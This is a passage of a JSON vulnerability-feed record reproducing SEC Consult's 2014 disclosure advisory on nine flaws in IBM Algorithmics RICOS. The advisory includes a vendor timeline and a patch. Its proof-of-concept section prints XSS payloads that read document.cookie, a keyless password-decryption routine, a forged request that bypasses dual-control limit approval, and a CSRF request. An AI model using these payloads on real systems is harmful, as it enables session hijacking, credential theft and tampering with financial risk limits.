n=\"CBNALI\" v=\"IS-LOCATED-IN\"/>\n <i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/>\n <i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/>\n </t>\n...SNIP...\n\n\nVulnerable / tested versions:\n- -----------------------------\nIBM Algorithmics RICOS 4.71\n\n\nVendor contact timeline:\n- ------------------------\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\n asking for acknowledgements\n2014-01-24: Sending acknowledgements\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\n2014-02-10: Providing further information on assumed to be false positive issue 1441\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\n patches are scheduled for end of June 2014\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\n2014-06-26: Vendor published patches and security bulletin\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\n2014-06-30: SEC Consult publishes the advisory\n\n\nSolution:\n- ---------\nApply patch ACLM 4.7.0.03 FP5. More information:\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\n\n\nWorkaround:\n- -----------\nLimit access to RICOS and manually perform sample checks regarding the\nplausibility of limits.\n\n\nAdvisory URL:\n- -------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested to work with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF F. Lukavsky / @2014\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\n\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\n=OFL7\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:13", "description": "", "cvss3": {}, "published": "2014-06-30T00:00:00", "type": "packetstorm", "title": "IBM Algorithmics RICOS Disclosure / XSS / CSRF", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-06-30T00:00:00", "id": "PACKETSTORM:127304", "href": "https://packetstormsecurity.com/files/127304/IBM-Algorithmics-RICOS-Disclosure-XSS-CSRF.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 > \n======================================================================= \ntitle: Multiple severe vulnerabilities \nproduct: IBM Algorithmics RICOS \nvulnerable version: 4.5.0 - 4.7.0 \nfixed version: 4.7.0.03 \nCVE number: CVE-2014-0894 \nCVE-2014-0871 \nCVE-2014-0870 \nCVE-2014-0869 \nCVE-2014-0868 \nCVE-2014-0867 \nCVE-2014-0866 \nCVE-2014-0865 \nCVE-2014-0864 \nimpact: critical \nhomepage: http://www-01.ibm.com/software/analytics/algorithmics/ \nfound: 2013-12-19 \nby: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n======================================================================= \n \nVendor description: \n- ------------------- \nIBM Algorithmics software enables financial institutions and corporate \ntreasuries to make risk-aware business decisions. Supported by a global \nteam of risk experts based in all major financial centers, IBM \nAlgorithmics solution offerings include market, credit and liquidity risk, \nas well as collateral and capital management. \n \nSource: http://www-01.ibm.com/software/analytics/algorithmics/ \n \nRICOS is a pre-deal limit management solution part of the Algo Suite. \n \n \nBusiness recommendation: \n- ------------------------ \nThe identified vulnerabilities affect integrity and confidentiality of the \nrisk management system. SEC Consult does not recommend to rely on RICOS as \npart of risk management until a thorough security review has been performed \nby security professionals. As a workaround, access should be limited only to \ntrusted users internally and sample checks regarding the plausibility of limits \nshould be performed manually. \n \n \nVulnerability overview/description: \n- ----------------------------------- \n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3) \nThe Tomcat configuration discloses technical details within error messages to \nthe user, which allows an attacker to collect valuable data about the \nenvironment of the solution. \n \n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5) \nThe password and the username of the backend database are disclosed in \nclear-text to the user of the web application. This allows attackers to \ndirectly connect to the backend database and manipulate arbitrary data stored \nin the database (e.g. limits). \n \n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3) \nSeveral parameters in the RICOS web front end and the Blotter are not properly \nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal \nuser sessions and impersonate other users while performing arbitrary actions \non behalf of the victim user. \n \n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3) \nWeak cryptographic algorithms, being used to store and transfer \nuser's passwords, allow an attacker to retrieve the plain-text passwords \nwithout further knowledge of cryptographic keys. \n \n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / \nCVSS 3.5) \nSeveral fields of stored data within RICOS are marked as read-only in the web \napplication, disallowing modification of certain fields. These checks are only \nperformed client-side, allowing an attacker to alter arbitrary data. An \nattacker can create a limit, alter the username of the created limit and \nconfirm the limit himself, circumventing dual control mechanisms advertised by \nRICOS. \n \n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3) \nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary \ncookies for a user that clicks on a manipulated link. \n \n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3) \nThe RICOS fat client submits user credentials in plain-text. An attacker with \naccess to the network communication can perform man-in-the-middle attacks and \nsteal user credentials. \nThis vulnerability also applies to the Blotter, where authentication is \nperformed unencrypted. \n \n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5) \nThe RICOS fat client performs input validation only client-side. This allows \nan attacker to alter arbitrary data. An attacker can create a limit, alter \nthe username of the created limit and confirm the limit himself, circumventing \ndual control mechanisms advertised by RICOS. \n \n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3) \nThe web application does not verify that requests are made only from within \nthe web application, allowing an attacker to trick users into performing \nrequests to the web application. This allows an attacker to perform tasks on \nbehalf of the victim user like modifying limits. \n \n \nProof of concept: \n- ----------------- \n1) Information Disclosure \nThe following URL causes a status 404, disclosing the Tomcat version: \nhttps://ricos/ricos470/classes/ \n \nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace \nis triggered \n \n2) Password Disclosure \nThe following request sent by the client during regular communication shows the \ndatabase connection settings including the username and the password in \nclear-text. \n \nPOST /ricos470/Executer HTTP/1.1 \nHost: ricos \n \n...SNIP... \n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i \nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t \nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\" \nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i \nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i \nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\" \nv=\"password\"/> \n...SNIP... \n \n3) Non-permanent Cross-Site Scripting \nThe following URLs demonstrate Cross-Site Scripting vulnerabilities: \n \nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1 \nHost: ricos \n \nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang.... \n \nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x \n \nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);// \n \nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y \n \n \nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script> \n \n4) Broken Encryption \nThe user's password is transported frequently in requests within the application. \nThe following function decrypts the password without requiring any cryptographic key: \n \npublic static void decrypt(String string) \n{ \nint nRadix = 32; \nint nR2 = nRadix * nRadix / 2; \nGregorianCalendar cal = new GregorianCalendar(); \nString key = string.substring(0, 2); \nint nKey = Integer.parseInt(key, 32); \n \nString encPw = string.substring(2, string.length()); \nint y = 0; \nfor (int i = 0; i < encPw.length(); i+=2) \n{ \nString aktuell = encPw.substring(i,i+2); \nint new_value = Integer.parseInt(aktuell, 32); \nint character = - nKey * (y + 1) % nR2 + new_value; \nchar decrypt = (char) character; \nSystem.out.print(decrypt); \ny = y + 1; \n} \n} \n \n5) Manipulation of read-only data / dual control mechanism bypass \nThe following example illustrates how to manipulate a request so that the server \nsaves it on behalf of another user (only the relevant parts are shown): \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.getmeta_udf\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#OutputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#ResultData\" v=\"#ResultData\"/> \n<i n=\"#ResultTable\" v=\"#ResultTable\"/> \n</t> \n</t> \n<t n=\"#InputData\"> \n<t n=\"#WorkTable\"> \n<t n=\"det_limit\"> \n<i n=\"SCTYGEID\" v=\"A\"/> \n[...] \n<i n=\"LMLCURID\" v=\"other_user\"/> \n<i n=\"LMEQEPSTDA\" v=\"\"/> \n[...] \n<i n=\"MFURID\" v=\"other_user\"/> \n<i n=\"LMEVFL\" v=\"N\"/> \n<i n=\"SOLMFL\" v=\"N\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n<i n=\"MFURID\" v=\"other_user\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n[...] \n</t> \n<t n=\"Session\"> \n<t n=\"SessionData\"> \n<i n=\"LoginUser\" v=\"other_user\"/> \n<i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/> \n[...] \n<i n=\"LoginUser v=\"other_user\"/> \n<i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/> \n<i n=\"URN\" v=\"\"/> \n<i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/> \n[...] \n</t> \n<t n=\"ObServer\"> \n<i n=\"UserId\" v=\"other_user\"/> \n<i n=\"Password\" v=\"\"/> \n<i n=\"Host\" v=\"ricos\"/> \n[...] \n<i n=\"Prefix\" v=\"RICA\"/> \n<i n=\"DbSystem\" v=\"oracle\"/> \n<i n=\"LoginUserId\" v=\"other_user\"/> \n</t> \n</t> \n</t> \n</ds> \n \n6) Cross-Site Cookie Setting \nThe following URL allows setting of arbitrary cookies: \n \nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content \n \n7) Plain-text submission of passwords \nNeither the fat client nor the Blotter use https to communicate with the \nbackend server. Both send unencrypted credentials via http during authentication. \n \n8) Client-side Input Validation \nBy manipulating serialized objects that are transmitted by the fat client, \nit is possible to change the user name who created a limit, allowing an attacker \nto bypass dual control mechanisms. \n \n9) Cross-Site Request Forgery \nThe following request, sent on behalf of an authenticated user will e.g. \nchange the currency of a given deal: \n \nPOST http://ricos/ricos470/Executer HTTP/1.1 \nHost: ricos \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.updrec_msp\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#InputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#InputData\" v=\"det_msp\"/> \n</t> \n<t n=\"#WorkTable\"> \n<t n=\"det_msp\"> \n<i n=\"SYPMID\" v=\"SYS-PAR-ID\"/> \n<i n=\"CUCD\" v=\"USD\"/> \n<i n=\"MIGORILV\" v=\"11\"/> \n<i n=\"ILPLMVFL\" v=\"Y\"/> \n<i n=\"ILNEMVFL\" v=\"Y\"/> \n<i n=\"BSCUONFL\" v=\"N\"/> \n<i n=\"PBSCUOFL\" v=\"N\"/> \n<i n=\"LORICUTEFL\" v=\"N\"/> \n<i n=\"SYSAVAILFL\" v=\"F\"/> \n<i n=\"CUSTID\" v=\"CUSTOMER\"/> \n<i n=\"CBNALI\" v=\"IS-LOCATED-IN\"/> \n<i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/> \n<i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/> \n</t> \n...SNIP... \n \n \nVulnerable / tested versions: \n- ----------------------------- \nIBM Algorithmics RICOS 4.71 \n \n \nVendor contact timeline: \n- ------------------------ \n2014-01-24: Contacting vendor through psirt@vnet.ibm.com \n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues \nasking for acknowledgements \n2014-01-24: Sending acknowledgements \n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues \n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS \n2014-02-10: Providing further information on assumed to be false positive issue 1441 \n2014-02-14: Telco to clarify vulnerability details and agree on further procedure \npatches are scheduled for end of June 2014 \n2014-02-20: Vendor confirms issue 1441 to be a vulnerability \n2014-05-27: Vendor announces that patches will be released on 2014-06-30 \n2014-06-26: Vendor published patches and security bulletin \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n2014-06-30: SEC Consult publishes the advisory \n \n \nSolution: \n- --------- \nApply patch ACLM 4.7.0.03 FP5. More information: \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n \n \nWorkaround: \n- ----------- \nLimit access to RICOS and manually perform sample checks regarding the \nplausibility of limits. \n \n \nAdvisory URL: \n- ------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Vulnerability Lab \n \nSEC Consult \nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius \n \nHeadquarter: \nMooslackengasse 17, 1190 Vienna, Austria \nPhone: +43 1 8903043 0 \nFax: +43 1 8903043 15 \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nInterested to work with the experts of SEC Consult? \nWrite to career@sec-consult.com \n \nEOF F. Lukavsky / @2014 \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/ \n \niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+ \nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg \nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F \nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e \n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl \nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8= \n=OFL7 \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/127304/SA-20140630-0.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}